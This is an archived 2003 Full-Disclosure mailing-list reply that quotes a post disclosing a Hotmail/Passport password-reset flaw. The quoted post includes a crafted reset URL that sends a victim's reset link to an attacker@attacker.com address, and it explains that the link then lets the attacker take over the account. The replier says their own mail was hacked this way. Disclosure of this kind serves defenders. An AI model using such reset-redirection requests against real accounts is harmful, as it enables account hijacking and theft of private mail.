Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
From: dong-h0un U (xploit_at_hackermail.com)
Date: 05/08/03
- Previous message: Christopher F. Herot: "RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Maybe in reply to: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Next in thread: Michael J McCafferty: "Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: mfrd@attitudex.com, full-disclosure@lists.netsys.com Date: Thu, 08 May 2003 12:51:39 +0800
I encountered my mail hacking by this method.
And looked for a person who hack it.
This method could not be exhibited easily so.
Thank at your information. :-)
P.S: Sorry for my poor english.
Hotmail's engineers desire to solve bug fast.
----- Original Message -----
From: Muhammad Faisal Rauf Danka <mfrd@attitudex.com>
Date: Wed, 7 May 2003 19:50:51 -0700 (PDT)
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
> Hotmail & Passport (.NET Accounts) Vulnerability
>
> There is a very serious and stupid vulnerability or badcoding in Hotmail / Passport’s (.NET Accounts)
>
> I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.
>
> I guess I don’t need to go in details of how cruical and important Hotmail / Passport’s .NET Account passport is to anyone.
>
> You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.
>
> It is so simple that it is funny.
>
> All you got to do is hit the following in your browser:
>
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
>
> And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:
>
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
>
> From that url, you can reset the password and I don’t think I need to say anything more about it.
>
> Vulnerability / Flaw discovered : 12th April 2003
> Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)
>
>
> Regards
> --------
> Muhammad Faisal Rauf Danka
>
> _____________________________________________________________
> ---------------------------
> [ATTITUDEX.COM]
> http://www.attitudex.com/
> ---------------------------
>
> _____________________________________________________________
> Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
-- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Christopher F. Herot: "RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Maybe in reply to: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Next in thread: Michael J McCafferty: "Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
